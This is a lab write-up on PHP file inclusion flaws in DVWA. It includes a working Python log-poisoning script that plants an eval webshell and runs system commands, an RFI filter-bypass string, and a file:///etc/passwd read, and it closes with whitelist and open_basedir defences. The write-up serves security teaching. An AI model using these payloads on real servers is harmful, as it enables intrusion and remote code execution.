Basic knowledge:
In PHP, a file inclusion vulnerability is usually introduced through one of the following four functions: include(), include_once(), require() and require_once().
require_once() and include_once() behave like require() and include(), except that if a file has already been included they will not include it a second time, which avoids function redefinition and variable reassignment problems.
In php.ini, allow_url_fopen is On by default; since PHP 5.2, allow_url_include defaults to Off.
Classification:
Local file inclusion (LFI):
Opening and including a file that is on the local server.
Remote file inclusion (RFI):
Only possible when both allow_url_fopen = On and allow_url_include = On are set.
1. Low level
Looking at the source, the incoming page parameter is included directly, without any filtering.
1. Local file inclusion
My DVWA is built on Windows; I created a new flag.txt on the D: drive and included it as follows:
In practice, though, we usually do not know the directory layout, so instead we can include the log files, whose default locations are known:
windows: apache/logs/access.log, apache/logs/error.log
linux: /var/log/apache/access.log, /var/log/apache2/access.log, /var/log/apache/access_log, /var/www/logs/access_log, /var/log/access_log
Each of these also has a corresponding error.log.
Exploiting the web log through inclusion:
localhost/dvwa/vulnerabilities/fi/?page=<?php @eval($_POST['shell']);?>
Note that the browser URL-encodes special characters, so the payload written into the log would not execute. Capture the request with Burp Suite, decode the payload back to plain text, and then forward it.
The request is recorded in the log, so the log now contains the one-line webshell; including the log file then executes it.
SSH logs can be poisoned in several ways as well; the default SSH log location is /var/log/auth.log.
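Writing the request by hand avoids the browser's URL encoding without having to decode it in Burp. The following is an added example, not code from the original writeup: it sends the poisoning request over a raw socket and then includes the log while POSTing the code to run. It assumes a local DVWA at localhost:80 under /dvwa/, the low-level page with no filtering, and a Linux Apache log at /var/log/apache2/access.log (all of these are assumptions; adjust for the target).

```python
import socket
import urllib.parse

# Constructed values for a local DVWA; adjust for the target.
TARGET_HOST = "localhost"
TARGET_PORT = 80
FI_PATH = "/dvwa/vulnerabilities/fi/"
# Assumed log location (Debian/Ubuntu apache2); see the list of defaults above.
LOG_PATH = "/var/log/apache2/access.log"
# The one-line webshell from the writeup.
WEBSHELL = "<?php @eval($_POST['shell']); ?>"


def build_poison_request(host, fi_path, webshell):
    """Raw GET that carries the PHP tag literally.

    A browser percent-encodes '<', '?', ' ' and so on, so the log would
    contain %3C%3Fphp ..., which PHP never executes. Building the bytes
    ourselves keeps the tag intact (the same effect as decoding the
    payload in Burp before forwarding). The tag is placed in the query
    string, as in the writeup, and also in User-Agent, which the
    combined log format records as well.
    """
    return (
        f"GET {fi_path}?page={webshell} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {webshell}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def build_trigger_request(host, fi_path, log_path, php_code):
    """POST that includes the poisoned log and passes code in the 'shell' field.

    The body is form-encoded so characters such as '&', '+' or quotes in
    the PHP code survive; eval() receives exactly php_code.
    """
    body = "shell=" + urllib.parse.quote(php_code, safe="")
    return (
        f"POST {fi_path}?page={log_path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
        f"{body}"
    ).encode()


def send_raw(host, port, request_bytes):
    """Send one raw HTTP request and return the complete response."""
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(request_bytes)
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    # Step 1: get the PHP tag into access.log.
    send_raw(TARGET_HOST, TARGET_PORT,
             build_poison_request(TARGET_HOST, FI_PATH, WEBSHELL))
    # Step 2: include the log; eval() runs the POSTed code.
    response = send_raw(TARGET_HOST, TARGET_PORT,
                        build_trigger_request(TARGET_HOST, FI_PATH, LOG_PATH,
                                              "system('id');"))
    print(response.decode(errors="replace"))
```

Because the request line contains spaces, Apache may answer the first request with 400; the line is still written to the access log, and the User-Agent copy is logged regardless. Every request, including the trigger POST, is itself appended to the log, so each run adds more lines to the included file.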
2. Remote file inclusion
Conditions for including over HTTP: allow_url_fopen = On and allow_url_include = On (the latter is Off by default).
http://localhost/dvwa/vulnerabilities/fi/?page=http://www.baidu.com
2. Medium level
View source:
str_replace() is used to replace "http://" and "https://" with an empty string.
Because str_replace() makes only a single pass, the filter can be bypassed by double-writing the string: removing the inner occurrence leaves a fresh copy of the protocol behind.
http://localhost/dvwa/vulnerabilities/fi/?page=hthttp://tp://www.baidu.com
The inclusion succeeds.
3. High level
View source:
The incoming page parameter must begin with "file", so the file:// protocol can be used to read local files.
Summary
Whitelist filtering: only include files whose names are on a fixed list of allowed pages.
open_basedir: the php.ini setting that authorizes directories.
open_basedir restricts the files the running script can access to the specified directory tree.
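To make the medium-level bypass, the high-level prefix check and the whitelist fix concrete, here is an added example (not DVWA's own PHP, and not from the original writeup) that models the three page-parameter checks in Python. The filter functions mirror the behaviour described above; the allowed page names in the whitelist are hypothetical.

```python
import fnmatch


def medium_filter(page):
    """Model of the medium level: str_replace(array("http://", "https://"), "", $file).

    PHP's str_replace makes one pass per search string and never rescans
    the result, so a removed substring can leave a new copy of the
    protocol behind.
    """
    for needle in ("http://", "https://"):
        page = page.replace(needle, "")
    return page


def double_write(url):
    """Build the double-write bypass for the medium filter.

    "http://host" becomes "hthttp://tp://host": the filter removes the
    inner "http://" and the outer one is reassembled from "ht" + "tp://".
    Works for any scheme, e.g. https -> "hthttps://tps://host".
    """
    scheme, rest = url.split("://", 1)
    return scheme[:2] + scheme + "://" + scheme[2:] + "://" + rest


def high_filter_allows(page):
    """Model of the high level: the parameter must begin with "file".

    fnmatchcase is used because PHP's fnmatch() is case-sensitive.
    A value such as "file:///etc/passwd" passes this check.
    """
    return fnmatch.fnmatchcase(page, "file*")


# Whitelist fix: the only acceptable values are the application's real
# page names (hypothetical list; use the actual pages of the application).
ALLOWED_PAGES = {"file1.php", "file2.php", "file3.php"}


def whitelist_resolve(page):
    """Return the file to include, or None if the value is not whitelisted.

    Nothing derived from user input reaches include(); the parameter is
    only compared against known names, so there is no string to bypass.
    """
    return page if page in ALLOWED_PAGES else None


if __name__ == "__main__":
    crafted = double_write("http://www.baidu.com")
    print(crafted, "->", medium_filter(crafted))            # protocol survives
    print("file:///etc/passwd allowed at high level:", high_filter_allows("file:///etc/passwd"))
    print("whitelist:", whitelist_resolve(crafted), whitelist_resolve("file1.php"))
```

open_basedir is the complementary server-side control: even if a crafted value reaches include(), PHP refuses to open files outside the configured directories, so a whitelist in the code and open_basedir in php.ini should be used together.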